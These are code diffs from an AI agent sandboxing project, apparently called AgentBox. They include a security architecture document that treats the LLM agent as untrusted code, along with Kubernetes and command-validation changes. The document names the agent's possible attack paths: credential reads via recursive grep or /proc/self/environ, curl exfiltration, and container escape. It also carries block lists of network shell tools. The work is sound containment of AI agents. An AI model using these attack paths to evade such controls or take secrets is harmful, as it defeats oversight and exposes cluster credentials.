+- [ ] Sandbox cannot write app code: `sudo -u sandbox touch /app/test` → Permission denied
+- [ ] Sandbox **can** read skills: `sudo -u sandbox cat skills/core/cluster-events/SKILL.md` → Success
+- [ ] Sandbox **can** write user-data: `sudo -u sandbox touch .siclaw/user-data/test` → Success
 
 Functional verification:
-- [ ] kubectl can read kubeconfig (setgid): `runuser -u sandbox -- kubectl get pods` → Success
-- [ ] grep cannot read kubeconfig: `runuser -u sandbox -- grep "" .siclaw/credentials/*.kubeconfig` → Permission denied
-- [ ] Pipeline works: `runuser -u sandbox -- bash -c "kubectl get pods | grep Error"` → Success
-- [ ] No SUID binaries: `runuser -u sandbox -- find / -perm /4000 -type f` → Empty
+- [ ] kubectl can read kubeconfig (setgid): `sudo -u sandbox kubectl get pods` → Success
+- [ ] grep cannot read kubeconfig: `sudo -u sandbox grep "" .siclaw/credentials/*.kubeconfig` → Permission denied
+- [ ] Pipeline works: `sudo -E -u sandbox bash -c 'kubectl get pods | grep Error'` → Success
+- [ ] Only sudo has SUID: `find / -perm /4000 -type f ! -path '/proc/*'` → `/usr/bin/sudo`
 - [ ] Run full test suite: `npm test`

--- a/docs/design/security.md
+++ b/docs/design/security.md
@@ -1,0 +1,547 @@
+---
+title: "AgentBox Security Architecture"
+sidebarTitle: "Security"
+description: "Defense-in-depth security model for LLM agent command execution in AgentBox containers."
+---
+
+# AgentBox Security Architecture
+
+> **Purpose**: Document the multi-layer security model that constrains what an LLM agent
+> can do inside an AgentBox container. Every layer is independent — compromising one does
+> not disable the others.
+>
+> **Audience**: Contributors modifying execution tools, Dockerfile, or K8s manifests.
+
+---
+
+## 1. Threat Model
+
+### 1.1 Core Assumption
+
+**The LLM agent is untrusted code.** It generates shell commands that execute in a
+container with access to Kubernetes clusters. The security model must assume the agent
+will attempt — intentionally or via prompt injection — to:
+
+1. **Read credentials**: kubeconfig, mTLS certificates, API keys, tokens
+2. **Exfiltrate data**: Send sensitive information to external endpoints
+3. **Escalate privileges**: Gain access beyond read-only K8s operations
+4. **Escape the container**: Exploit kernel or runtime vulnerabilities
+
+### 1.2 Trust Boundaries
+
+```
+┌─────────────────────────────────────────────────────────┐
+│ AgentBox Container                                       │
+│                                                          │
+│   ┌──────────────────────┐   ┌────────────────────────┐ │
+│   │ Main Process          │   │ Child Processes         │ │
+│   │ (agentbox user)       │   │ (sandbox user)          │ │
+│   │                       │   │                         │ │
+│   │ • Node.js runtime     │   │ • kubectl (setgid)      │ │
+│   │ • LLM API client      │   │ • grep, jq, sort, ...   │ │
+│   │ • Tool validation     │   │ • skill scripts          │ │
+│   │ • Reads kubeconfig    │   │ • NO credential access   │ │
+│   └──────────────────────┘   └────────────────────────┘ │
+│                                                          │
+│   Trust boundary: sandbox user cannot read agentbox's    │
+│   files (kubeconfig, mTLS certs, .siclaw/config/)        │
+└──────────────────────────────────────────────────────────┘
+```
+
+### 1.3 What We Protect
+
+| Asset | Location | Risk | Protection |
+|-------|----------|------|------------|
+| Kubeconfig | `.siclaw/credentials/` | Full cluster access | File permissions + setgid kubectl |
+| mTLS certs | `/etc/siclaw/certs/` | Gateway impersonation | File permissions (agentbox:agentbox 0600) |
+| API keys | `.siclaw/config/settings.json` | LLM API abuse, cost | File permissions + sensitive path patterns |
+| Environment vars | Process memory | Token leakage via /proc | `sanitizeEnv()` strips secrets before child spawn |
+| K8s service account | Pod metadata API | Cluster API access | `automountServiceAccountToken: false` |
+
+---
+
+## 2. Defense-in-Depth Overview
+
+Six independent layers, each providing protection even if others are bypassed:
+
+```
+Layer 1 — OS User Isolation       sandbox user cannot read credential files
+Layer 2 — Command Validation      6-pass whitelist pipeline blocks disallowed binaries
+Layer 3 — Container Hardening     drop ALL capabilities, seccomp, readOnlyRootFilesystem
+Layer 4 — File I/O Restrictions   assertPathAllowed() scopes agent file tools
+Layer 5 — Environment Sanitization  sanitizeEnv() strips API keys/tokens from child env
+Layer 6 — kubectl Access Control  read-only subcommands, exec binary whitelist
+```
+
+**Design principle**: Each layer is justified independently. Removing one layer must not
+create a viable attack path. The OS layer (Layer 1) is the **primary defense** for
+credential protection; application layers (2-6) are **secondary defense-in-depth**.
+
+---
+
+## 3. Layer 1: OS-Level User Isolation
+
+### 3.1 Dual-User Model
+
+Two users exist inside the AgentBox container:
+
+| User | UID | Groups | Purpose |
+|------|-----|--------|---------|
+| `agentbox` | 1000 | `agentbox`, `kubecred` | Main Node.js process. Owns credentials. |
+| `sandbox` | 1001 | `sandbox` | All child processes (shell commands). No credential access. |
+
+The main process (Node.js) runs as `agentbox`. When executing shell commands, it uses
+`runuser -u sandbox -- bash -c "<command>"` to drop to the `sandbox` user.
+
+### 3.2 setgid kubectl
+
+The `kubectl` binary has the setgid bit set for the `kubecred` group:
+
+```
+-rwxr-sr-x 1 root kubecred  kubectl
+```
+
+This allows `kubectl` to read kubeconfig files owned by `agentbox:kubecred` with mode
+`0640`, while other commands (grep, cut, cat) running as `sandbox` cannot.
+
+**Why setgid and not SUID**: setgid only changes the effective group ID, not the user ID.
+The process remains `sandbox` (UID 1001) but temporarily gains `kubecred` group membership.
+This is the minimum privilege needed for kubectl to read the kubeconfig.
+
+### 3.3 File Permission Matrix
+
+**Design principle**: OS-level permissions are the source of truth for access control.
+Application-level restrictions (`assertPathAllowed`, `writeAllowedDirs`) are a secondary
+defense — they prevent the agent from misusing its own file tools, but cannot constrain
+shell commands. The `sandbox` user's filesystem permissions must independently enforce
+the correct access boundaries.
+
+#### Credentials & secrets (sandbox: no access)
+
+| Path | Owner | Mode | agentbox | sandbox | kubectl (setgid) |
+|------|-------|------|----------|---------|-------------------|
+| `.siclaw/credentials/*.kubeconfig` | agentbox:kubecred | 0640 | rw | -- | r- (via group) |
+| `/etc/siclaw/certs/` | agentbox:agentbox | 0600 | rw | -- | -- |
+| `.siclaw/config/settings.json` | agentbox:agentbox | 0600 | rw | -- | -- |
+| `.siclaw/data.sqlite` | agentbox:agentbox | 0600 | rw | -- | -- |
+
+#### Skills & application code (sandbox: read-only)
+
+| Path | Owner | Mode | Volume | agentbox | sandbox | Notes |
+|------|-------|------|--------|----------|---------|-------|
+| `skills/core/` | agentbox:agentbox | 0755/0644 | rootfs (baked) | rwx/rw | r-x/r- | Built-in diagnostic skills. Baked into image. |
+| `.siclaw/skills/` | agentbox:agentbox | 0755/0644 | emptyDir | rwx/rw | r-x/r- | Team + personal skills synced from DB via `skillsHandler.materialize()`. |
+| `/app/` (application code) | agentbox:agentbox | 0755/0644 | rootfs | rwx/rw | r-x/r- | Node.js dist, package.json, etc. |
+
+**Skills write flow in K8s mode**: `skill.create` → DB → `notifySkillReload` → AgentBox main
+process (agentbox user) calls `skillsHandler.materialize()` → writes to emptyDir at
+`.siclaw/skills/`. The sandbox user (child processes) only reads from this directory.
+
+Agent needs to **read** skills (SKILL.md, scripts/) to understand and execute them.
+Agent must **never write** to skills — that goes through the skill review gate
+(WebUI → DB → resource sync → main process materialize).
+The `sandbox` user has no write permission on any of these by OS permission alone.
+
+#### User data (sandbox: read-write)
+
+| Path | Owner | Mode | agentbox | sandbox | Notes |
+|------|-------|------|----------|---------|-------|
+| `.siclaw/user-data/` | agentbox:agentbox | 0777 | rwx | rwx | Memory files, PROFILE.md, investigation notes. |
+| `/tmp/` | (any) | 1777 | rw | rw | Temporary files. Sticky bit prevents cross-user deletion. |
+
+The `user-data` directory is the **only** writable area for the sandbox user (besides /tmp).
+This matches the application-level `writeAllowedDirs = [userDataDir]` — but enforced at OS level.
+
+**Critical**: No sensitive files should be placed in `/tmp/` or `user-data/`.
+
+### 3.4 Pipeline Compatibility
+
+The dual-user model preserves natural shell pipeline syntax:
+
+```bash
+# sandbox runs the entire pipeline; kubectl gains kubecred via setgid
+runuser -u sandbox -- bash -c "kubectl get pods -A | grep Error | wc -l"
+```
+
+`kubectl` (setgid kubecred) reads the kubeconfig. `grep` and `wc` (plain sandbox) cannot.
+The pipe passes stdout data, not file access permissions.
+
+### 3.5 Dockerfile Changes
+
+```dockerfile
+FROM node:22-slim
+
+# Create groups and users
+RUN groupadd kubecred && \
+    groupadd sandbox && \
+    useradd -m -s /bin/bash -G kubecred agentbox && \
+    useradd -r -s /bin/false -g sandbox sandbox
+
+# Install kubectl with setgid
+COPY --from=bitnami/kubectl:latest /opt/bitnami/kubectl/bin/kubectl /usr/local/bin/kubectl
+RUN chgrp kubecred /usr/local/bin/kubectl && \
+    chmod 2755 /usr/local/bin/kubectl
+
+# Set credential permissions (entrypoint also enforces this)
+RUN mkdir -p /home/agentbox/.siclaw/credentials && \
+    chown agentbox:kubecred /home/agentbox/.siclaw/credentials && \
+    chmod 0750 /home/agentbox/.siclaw/credentials
+
+# Application code & skills: owned by agentbox, world-readable (sandbox can read)
+# COPY steps already produce agentbox-owned files when USER is set
+COPY --chown=agentbox:agentbox skills/ /app/skills/
+RUN chmod -R o+rX /app/ /app/skills/
+
+# User data: sandbox-writable (the only writable area for child processes)
+RUN mkdir -p /home/agentbox/.siclaw/user-data && \
+    chown agentbox:agentbox /home/agentbox/.siclaw/user-data && \
+    chmod 0777 /home/agentbox/.siclaw/user-data
+
+USER agentbox
+```
+
+### 3.6 Code Changes
+
+In `src/tools/restricted-bash.ts`, the `exec()` call wraps commands with `runuser`:
+
+```typescript
+const finalCommand = `runuser -u sandbox -- bash -c ${shellEscape(command)}`;
+```
+
+The `KUBECONFIG` environment variable is still set (kubectl reads it), but the kubeconfig
+file itself is only readable by `kubecred` group members.
+
+---
+
+## 4. Layer 2: Application-Level Command Validation
+
+### 4.1 The 6-Pass Validation Pipeline
+
+Every command passes through `validateCommand()` in `src/tools/command-validator.ts`:
+
+```
+Pass 1 — Shell Operators      Block: $(), backticks, <(), >(), file redirections, newlines
+Pass 2 — Pipeline Extraction   extractPipeline() with pipe-position tracking
+Pass 3 — Binary Whitelist      Context-based: local | node | pod | nsenter | ssh
+Pass 4 — Pipeline Validators   kubectl subcommand checks
+Pass 5 — COMMAND_RULES         Per-command: pipeOnly, noFilePaths, blockedFlags, allowedFlags
+Pass 6 — Sensitive Paths       Block commands targeting credential/config file paths
+```
+
+### 4.2 Context-Based Whitelisting
+
+Different execution contexts allow different command sets:
+
+| Context | Used By | Scope |
+|---------|---------|-------|
+| `local` | `restricted-bash.ts` | AgentBox container — text processing + kubectl |
+| `node` | `node-exec.ts` | Remote node (via debug pod) — full diagnostics |
+| `pod` | `pod-exec.ts` | Target pod — full diagnostics |
+| `nsenter` | `pod-nsenter-exec.ts` | Target pod network namespace — full diagnostics |
+
+The `local` context is the most restrictive: only text-processing commands (grep, jq, sort,
+etc.), flow control (echo, printf), and kubectl. File-reading commands (cat, ls, find) are
+blocked — agents use dedicated file tools instead.
+
+**Source**: `src/tools/command-sets.ts` — `CONTEXT_CATEGORIES`, `COMMAND_CATEGORIES`
+
+### 4.3 COMMAND_RULES Declarative Engine
+
+Per-command restrictions are defined declaratively in `COMMAND_RULES`:
+
+```typescript
+interface CommandRule {
+  command: string;
+  contexts?: string[];      // execution contexts where rule applies
+  pipeOnly?: boolean;       // must appear after pipe |
+  noFilePaths?: boolean;    // block /, ./, ../, ~ positional args
+  blockedFlags?: string[];  // explicitly forbidden flags
+  allowedFlags?: string[];  // only these flags allowed
+  allowedSubcommands?: { position: number; allowed: string[] };
+  positionals?: "allow" | "block" | number;
+  requiredFlags?: string[];
+  customValidator?: string;
+}
+```
+
+Example: In the `local` context, `grep` is pipe-only with no file paths and no recursive flags:
+
+```typescript
+grep: { command: "grep", contexts: ["local"], pipeOnly: true, noFilePaths: true,
+         blockedFlags: ["-r", "-R", "--recursive"] }
+```
+
+This prevents `kubectl get pods | grep -rl "" /app/.siclaw` from reading credential files
+even though `grep` appears after a pipe.
+
+**Source**: `src/tools/command-sets.ts` — `COMMAND_RULES`
+
+### 4.4 Explicitly Excluded Binaries
+
+| Command | Reason |
+|---------|--------|
+| `sed` | `-i` in-place write, `-e`/`r`/`w` file ops, `e` command execution |
+| `awk`/`gawk` | `system()`, `getline`, pipe-to-shell execution |
+| `bc` | `!command` shell escape |
+| `nc`/`netcat`/`ncat` | Arbitrary TCP, exfiltration |
+| `wget` | File write, recursive crawl |
+| `bash`/`sh` (direct) | Unrestricted shell — `restricted-bash` wraps with validation |
+
+### 4.5 Role After OS Isolation
+
+With OS-level user isolation (Layer 1), the application-level command validation becomes a
+**secondary defense layer**. It still provides value:
+
+- Blocks commands with dangerous side effects (network exfiltration via `curl -d`)
+- Restricts kubectl to read-only subcommands (OS isolation doesn't help here)
+- Prevents shell injection via `$()`, backticks, redirections
+- Provides audit trail of blocked commands
+
+The `local`-context rules (pipeOnly, noFilePaths, blockedFlags) can be **relaxed** after
+OS isolation is deployed, since the sandbox user cannot read credential files regardless.
+However, they remain as defense-in-depth.
+
+---
+
+## 5. Layer 3: Container Hardening
+
+### 5.1 K8s SecurityContext
+
+```yaml
+spec:
+  securityContext:
+    runAsNonRoot: false          # Main process needs runuser (requires root or CAP_SETUID)
+    seccompProfile:
+      type: RuntimeDefault
+  containers:
+  - name: agentbox
+    securityContext:
+      capabilities:
+        drop: ["ALL"]
+        add: ["SETUID", "SETGID"]  # Required for runuser -u sandbox
+      readOnlyRootFilesystem: true
+    volumeMounts:
+    - name: tmp
+      mountPath: /tmp
+    - name: siclaw-data
+      mountPath: /home/agentbox/.siclaw
+  volumes:
+  - name: tmp
+    emptyDir:
+      sizeLimit: 100Mi
+```
+
+### 5.2 Capability Justification
+
+| Capability | Why needed | Risk |
+|------------|-----------|------|
+| `SETUID` | `runuser -u sandbox` requires switching effective UID | Low — only used to drop privileges, not gain them |
+| `SETGID` | `runuser` also switches GID; kubectl setgid requires kernel enforcement | Low — setgid only grants kubecred group |
+| All others | Dropped | N/A |
+
+### 5.3 What Is Blocked
+
+With `drop: ALL` + only SETUID/SETGID:
+
+- `CAP_NET_RAW` dropped — no raw sockets, no packet sniffing
+- `CAP_SYS_PTRACE` dropped — no debugging/attaching to other processes
+- `CAP_SYS_ADMIN` dropped — no mount, no namespace manipulation
+- `CAP_SYS_MODULE` dropped — no kernel module loading
+- `CAP_DAC_OVERRIDE` dropped — cannot bypass file permission checks
+- `CAP_NET_ADMIN` dropped — no network config changes
+
+### 5.4 Additional Hardening
+
+```yaml
+# Already in place
+automountServiceAccountToken: false   # No K8s API access via service account
+
+# Recommended additions
+spec:
+  hostNetwork: false
+  hostPID: false
+  hostIPC: false
+```
+
+---
+
+## 6. Layer 4: File I/O Path Restrictions (Application-Level)
+
+Agent file tools (`read`, `edit`, `write`, `grep`, `find`, `ls`) are scoped by
+`assertPathAllowed()` in `src/core/agent-factory.ts`:
+
+```
+Read allowed:  builtin skills, dynamic skills, userDataDir, reports
+Write allowed: userDataDir ONLY
+Blocked:       credentials, config, system dirs, anything outside allowed paths
+```
+
+**Relationship to OS permissions**: This layer does NOT protect against bash commands —
+that is the job of Layer 1 (OS user isolation). `assertPathAllowed` restricts **which
+directories the agent's own file tools can see**, providing a curated view of the filesystem.
+Even if the sandbox user can `r-x` skills directories, the agent's `write` tool still refuses
+to write there because `writeAllowedDirs = [userDataDir]`.
+
+Both layers are needed:
+- **OS permissions** (Layer 1): Enforces that `sandbox` cannot write to skills, credentials, app code — regardless of what commands are used
+- **assertPathAllowed** (Layer 4): Restricts the agent's file tool **scope** to diagnostic-relevant directories only — prevents the agent from browsing `/etc`, `/proc`, or other irrelevant areas
+
+**Source**: `src/core/agent-factory.ts` — `assertPathAllowed()`
+
+---
+
+## 7. Layer 5: Environment Sanitization
+
+`sanitizeEnv()` in `src/tools/sanitize-env.ts` strips sensitive variables before
+spawning child processes:
+
+```
+Stripped patterns:
+  *_API_KEY, *_SECRET, *_TOKEN, *_PASSWORD, *_CREDENTIAL
+  ANTHROPIC_*, OPENAI_*, SICLAW_LLM_*
+  SICLAW_GATEWAY_URL (prevents AgentBox → Gateway API calls)
+```
+
+**Why this layer persists with OS isolation**: Environment variables live in process memory
+(`/proc/self/environ`), not in files. Even if the sandbox user cannot read credential files,
+`cat /proc/self/environ` in a child process could leak API keys if they were inherited.
+`sanitizeEnv()` prevents this.
+
+**Source**: `src/tools/sanitize-env.ts`
+
+---
+
+## 8. Layer 6: kubectl Access Control
+
+### 8.1 Read-Only Subcommands
+
+```
+Allowed: get, describe, logs, top, events, api-resources, api-versions,
+         cluster-info, config, version, explain, auth, exec
+```
+
+**All write operations permanently blocked**: apply, create, delete, patch, scale, drain,
+cordon, edit, replace, label, taint, rollout undo.
+
+### 8.2 kubectl exec Restrictions
+
+When `kubectl exec` is used (e.g., `kubectl exec my-pod -- ip addr`), the exec'd command
+passes through the binary allowlist. Only commands in `ALLOWED_COMMANDS` can be exec'd.
+
+### 8.3 kubectl config view --raw Blocked
+
+`kubectl config view --raw` is explicitly blocked — it outputs kubeconfig with embedded
+certificates and tokens in plaintext.
+
+**Source**: `src/tools/kubectl.ts` — `SAFE_SUBCOMMANDS`, `validateExecCommand()`
+
+---
+
+## 9. Container Escape Risk Assessment
+
+### 9.1 Attack Surface Analysis
+
+| Vector | Feasibility | Mitigation |
+|--------|-------------|------------|
+| Kernel exploit (e.g., CVE-2024-1086) | Low — requires specific unpatched kernel | Keep nodes updated; seccomp blocks most exploit syscalls |
+| Node.js RCE (prototype pollution) | Medium — if LLM triggers Node.js vulnerability, gains agentbox user | agentbox can read kubeconfig (by design), but K8s RBAC limits cluster access |
+| kubectl vulnerability | Low — static Go binary, read-only ops, limited subcommands | Keep kubectl updated |
+| `/proc/self/environ` in child | Blocked — `sanitizeEnv()` strips secrets | Layer 5 |
+| SUID/SGID binary exploitation | Blocked — `readOnlyRootFilesystem: true`, no SUID binaries in image | Layer 3 |
+| Container runtime escape | Very low — standard containerd/runc, non-root child processes | Infrastructure concern, not app-level |
+| Network exfiltration | Medium — sandbox can reach network | `curl -d` blocked (Layer 2); Network Policy recommended |
+| Mount namespace manipulation | Blocked — `CAP_SYS_ADMIN` dropped | Layer 3 |
+
+### 9.2 Residual Risks
+
+1. **Node.js process compromise**: If the LLM exploits a Node.js vulnerability, it gains
+   `agentbox` user privileges (can read kubeconfig). Mitigation: K8s RBAC should scope the
+   kubeconfig to read-only cluster access.
+
+2. **Network-level exfiltration**: The sandbox user can make network connections (DNS, HTTP)
+   unless restricted by NetworkPolicy. Recommendation: deploy NetworkPolicy to limit egress
+   to the K8s API server and required endpoints only.
+
+3. **Shared /tmp**: Both agentbox and sandbox can read/write `/tmp`. Do not store sensitive
+   data in `/tmp`. Use `mktemp` with restrictive permissions if temporary files are needed.
+
+### 9.3 Recommended NetworkPolicy
+
+```yaml
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+  name: agentbox-egress
+spec:
+  podSelector:
+    matchLabels:
+      app: agentbox
+  policyTypes:
+  - Egress
+  egress:
+  - to:
+    - ipBlock:
+        cidr: <k8s-api-server-cidr>/32
+    ports:
+    - port: 6443
+      protocol: TCP
+  - to:
+    - namespaceSelector:
+        matchLabels:
+          app: siclaw-gateway
+    ports:
+    - port: 3002
+      protocol: TCP
+  - to:                          # DNS
+    - namespaceSelector: {}
+    ports:
+    - port: 53
+      protocol: UDP
+```
+
+---
+
+## 10. Implementation Checklist
+
+### 10.1 Dockerfile
+
+- [ ] Create `kubecred` and `sandbox` groups/users
+- [ ] Install kubectl with `chmod 2755` + `chgrp kubecred`
+- [ ] Credential dirs: `agentbox:kubecred 0750` (sandbox: no access, kubectl: read via group)
+- [ ] Config/cert files: `agentbox:agentbox 0600` (sandbox: no access)
+- [ ] Skills dirs: `agentbox:agentbox 0755/0644` (sandbox: read-only)
+- [ ] App code: `agentbox:agentbox 0755/0644` (sandbox: read-only)
+- [ ] User data dir: `agentbox:agentbox 0777` (sandbox: read-write — the only writable area)
+- [ ] Verify no SUID binaries in final image: `find / -perm /4000 -type f`
+
+### 10.2 K8s Manifests
+
+- [ ] Add `capabilities: { drop: ["ALL"], add: ["SETUID", "SETGID"] }`
+- [ ] Add `readOnlyRootFilesystem: true` with emptyDir for `/tmp`
+- [ ] Add `seccompProfile: { type: RuntimeDefault }`
+- [ ] Keep `automountServiceAccountToken: false`
+- [ ] Deploy NetworkPolicy for egress restriction
+
+### 10.3 Application Code
+
+- [ ] `restricted-bash.ts`: Wrap commands with `runuser -u sandbox --`
+- [ ] Verify `sanitizeEnv()` still strips all sensitive vars (Layer 5 remains)
+- [ ] Verify `assertPathAllowed()` still scopes file tools (Layer 4 remains)
+- [ ] Entrypoint script: enforce file permissions on startup (defense against volume mount issues)
+
+### 10.4 Validation
+
+File permission verification:
+- [ ] Sandbox cannot read credentials: `runuser -u sandbox -- cat .siclaw/credentials/*.kubeconfig` → Permission denied
+- [ ] Sandbox cannot read config: `runuser -u sandbox -- cat .siclaw/config/settings.json` → Permission denied
+- [ ] Sandbox cannot write skills: `runuser -u sandbox -- touch skills/core/test` → Permission denied
+- [ ] Sandbox cannot write app code: `runuser -u sandbox -- touch /app/test` → Permission denied
+- [ ] Sandbox **can** read skills: `runuser -u sandbox -- cat skills/core/cluster-events/SKILL.md` → Success
+- [ ] Sandbox **can** write user-data: `runuser -u sandbox -- touch .siclaw/user-data/test` → Success
+
+Functional verification:
+- [ ] kubectl can read kubeconfig (setgid): `runuser -u sandbox -- kubectl get pods` → Success
+- [ ] grep cannot read kubeconfig: `runuser -u sandbox -- grep "" .siclaw/credentials/*.kubeconfig` → Permission denied
+- [ ] Pipeline works: `runuser -u sandbox -- bash -c "kubectl get pods | grep Error"` → Success
+- [ ] No SUID binaries: `runuser -u sandbox -- find / -perm /4000 -type f` → Empty
+- [ ] Run full test suite: `npm test`

--- a/src/gateway/agentbox/k8s-spawner.ts
+++ b/src/gateway/agentbox/k8s-spawner.ts
@@ -231,6 +231,10 @@ export class K8sSpawner implements BoxSpawner {
             name: "client-cert",
             secret: { secretName: certSecretName },
           },
+          {
+            name: "tmp",
+            emptyDir: { sizeLimit: "100Mi" },
+          },
         ],
         containers: [
           {
@@ -242,6 +246,7 @@ export class K8sSpawner implements BoxSpawner {
                 drop: ["ALL"],
                 add: ["SETUID", "SETGID"],
               },
+              readOnlyRootFilesystem: true,
             },
             ports: [
               { containerPort: 3000, name: "https" },
@@ -266,6 +271,10 @@ export class K8sSpawner implements BoxSpawner {
                 name: "client-cert",
                 mountPath: "/etc/siclaw/certs",
                 readOnly: true,
+              },
+              {
+                name: "tmp",
+                mountPath: "/tmp",
               },
             ],
             resources: {

--- a/src/gateway/agentbox/k8s-spawner.ts
+++ b/src/gateway/agentbox/k8s-spawner.ts
@@ -179,7 +179,46 @@ export class K8sSpawner implements BoxSpawner {
         subdomain: "agentbox-hs",
         automountServiceAccountToken: false,
         restartPolicy: "Never",
+        // ── Security: dual-user isolation (ADR-010) ─────────────────
+        // Container starts as root (entrypoint fixes volume permissions,
+        // then drops to agentbox via runuser). Child processes run as
+        // sandbox user via sudo. Capabilities restricted to SETUID/SETGID
+        // only — the minimum needed for user switching.
+        securityContext: {
+          seccompProfile: { type: "RuntimeDefault" },
+        },
+        initContainers: [
+          {
+            name: "init-permissions",
+            image,
+            imagePullPolicy,
+            securityContext: {
+              runAsUser: 0,
+            },
+            command: ["sh", "-c", [
+              // Credentials dir: agentbox:kubecred 0750 (sandbox can't read)
+              "chown -R 1000:1002 /app/.siclaw/credentials",
+              "chmod 0750 /app/.siclaw/credentials",
+              "find /app/.siclaw/credentials -type f -exec chmod 0640 {} \\;",
+              // Skills dir: agentbox:agentbox 0755 (sandbox can read)
+              "chown -R 1000:1000 /app/.siclaw/skills",
+              "chmod 0755 /app/.siclaw/skills",
+              // User data: world-writable (sandbox needs write access)
+              "chown -R 1000:1000 /app/.siclaw/user-data",
+              "chmod 0777 /app/.siclaw/user-data",
+            ].join(" && ")],
+            volumeMounts: [
+              { name: "credentials", mountPath: "/app/.siclaw/credentials" },
+              { name: "skills-local", mountPath: "/app/.siclaw/skills" },
+              { name: "user-data", mountPath: "/app/.siclaw/user-data" },
+            ],
+          },
+        ],
         volumes: [
+          {
+            name: "credentials",
+            emptyDir: {},
+          },
           {
             name: "skills-local",
             emptyDir: {},
@@ -198,12 +237,22 @@ export class K8sSpawner implements BoxSpawner {
             name: "agentbox",
             image,
             imagePullPolicy,
+            securityContext: {
+              capabilities: {
+                drop: ["ALL"],
+                add: ["SETUID", "SETGID"],
+              },
+            },
             ports: [
               { containerPort: 3000, name: "https" },
               { containerPort: 9090, name: "metrics" },
             ],
             env,
             volumeMounts: [
+              {
+                name: "credentials",
+                mountPath: "/app/.siclaw/credentials",
+              },
               {
                 name: "skills-local",
                 mountPath: "/app/.siclaw/skills",
@@ -244,7 +293,8 @@ export class K8sSpawner implements BoxSpawner {
       },
     };
 
-    // If a kubeconfig is provided, mount it as a Secret
+    // If a kubeconfig is provided, mount it via the init container
+    // into the credentials volume (agentbox:kubecred 0640).
     if (boxConfig.kubeconfigBase64) {
       const secretName = `${podName}-kubeconfig`;
 
@@ -259,16 +309,29 @@ export class K8sSpawner implements BoxSpawner {
         },
       });
 
-      // Append kubeconfig volume and mount
+      // Mount the kubeconfig Secret into the init container at a temp path,
+      // and copy it to credentials dir with correct ownership/permissions
       pod.spec!.volumes!.push({
-        name: "kubeconfig",
+        name: "kubeconfig-secret",
         secret: { secretName },
       });
-      pod.spec!.containers[0].volumeMounts!.push({
-        name: "kubeconfig",
-        mountPath: "/home/agentbox/.kube",
+      pod.spec!.initContainers![0].volumeMounts!.push({
+        name: "kubeconfig-secret",
+        mountPath: "/tmp/kubeconfig",
         readOnly: true,
       });
+      // Extend init command to copy kubeconfig with proper permissions
+      const initCmd = pod.spec!.initContainers![0].command![2] as string;
+      pod.spec!.initContainers![0].command![2] = initCmd +
+        " && cp /tmp/kubeconfig/config /app/.siclaw/credentials/kubeconfig" +
+        " && chown 1000:1002 /app/.siclaw/credentials/kubeconfig" +
+        " && chmod 0640 /app/.siclaw/credentials/kubeconfig";
+
+      // Add KUBECONFIG and SICLAW_CREDENTIALS_DIR env vars
+      env.push(
+        { name: "KUBECONFIG", value: "/app/.siclaw/credentials/kubeconfig" },
+        { name: "SICLAW_CREDENTIALS_DIR", value: "/app/.siclaw/credentials" },
+      );
     }
 
     // Create Pod (handle 409 Conflict if another process created it concurrently)

--- a/src/tools/command-sets.ts
+++ b/src/tools/command-sets.ts
@@ -245,6 +245,18 @@ export interface CommandRule {
   category?: string;
   description?: string;
 
+  /** Execution contexts where this rule applies. Absent → all contexts. */
+  contexts?: string[];
+
+  /** If true, command must appear after a pipe | operator (stdin-only). */
+  pipeOnly?: boolean;
+
+  /** If true, block positional args that look like file paths (/, ./, ../, ~). */
+  noFilePaths?: boolean;
+
+  /** Flags that are explicitly blocked (checked per-character for short flags). */
+  blockedFlags?: string[];
+
   /** Flag whitelist. Present → check flags; absent → all flags allowed. */
   allowedFlags?: string[];
 
@@ -264,30 +276,51 @@ export interface CommandRule {
   customValidator?: string;
 }
 
-export const COMMAND_RULES: Record<string, CommandRule> = {
+export const COMMAND_RULES: Record<string, CommandRule | CommandRule[]> = {
+
+  // ── Text commands: local-context stdin-only rules ──
+  // In local (agentbox) context, text commands must only process piped stdin.
+  // They cannot read files directly or traverse directories.
+
+  grep:   { command: "grep",   contexts: ["local"], pipeOnly: true, noFilePaths: true, blockedFlags: ["-r", "-R", "--recursive"] },
+  egrep:  { command: "egrep",  contexts: ["local"], pipeOnly: true, noFilePaths: true, blockedFlags: ["-r", "-R", "--recursive"] },
+  fgrep:  { command: "fgrep",  contexts: ["local"], pipeOnly: true, noFilePaths: true, blockedFlags: ["-r", "-R", "--recursive"] },
+  cut:    { command: "cut",    contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  head:   { command: "head",   contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  tail:   { command: "tail",   contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  wc:     { command: "wc",     contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  tr:     { command: "tr",     contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  column: { command: "column", contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  jq:     { command: "jq",     contexts: ["local"], pipeOnly: true, noFilePaths: true },
 
   // ── Flag whitelist ──
 
-  sort: {
-    command: "sort", category: "text",
-    allowedFlags: [
-      "-r", "-n", "-k", "-t", "-u", "-f", "-h", "-V", "-s", "-b", "-g", "-M", "-d", "-i",
-      "--reverse", "--numeric-sort", "--key", "--field-separator", "--unique",
-      "--human-numeric-sort", "--version-sort", "--stable", "--ignore-leading-blanks",
-      "--general-numeric-sort", "--month-sort", "--dictionary-order", "--ignore-case",
-    ],
-  },
+  sort: [
+    {
+      command: "sort", category: "text",
+      allowedFlags: [
+        "-r", "-n", "-k", "-t", "-u", "-f", "-h", "-V", "-s", "-b", "-g", "-M", "-d", "-i",
+        "--reverse", "--numeric-sort", "--key", "--field-separator", "--unique",
+        "--human-numeric-sort", "--version-sort", "--stable", "--ignore-leading-blanks",
+        "--general-numeric-sort", "--month-sort", "--dictionary-order", "--ignore-case",
+      ],
+    },
+    { command: "sort", contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  ],
 
-  yq: {
-    command: "yq", category: "text",
-    allowedFlags: [
-      "-r", "--raw-output", "-e", "--exit-status", "-o", "--output-format",
-      "-P", "--prettyprint", "-C", "--colors", "-M", "--no-colors",
-      "-N", "--no-doc", "-j", "--tojson", "-p", "--input-format",
-      "--xml-attribute-prefix", "--xml-content-name",
-      "-s", "--split-exp", "--unwrapScalar", "--nul-output", "--header-preprocess",
-    ],
-  },
+  yq: [
+    {
+      command: "yq", category: "text",
+      allowedFlags: [
+        "-r", "--raw-output", "-e", "--exit-status", "-o", "--output-format",
+        "-P", "--prettyprint", "-C", "--colors", "-M", "--no-colors",
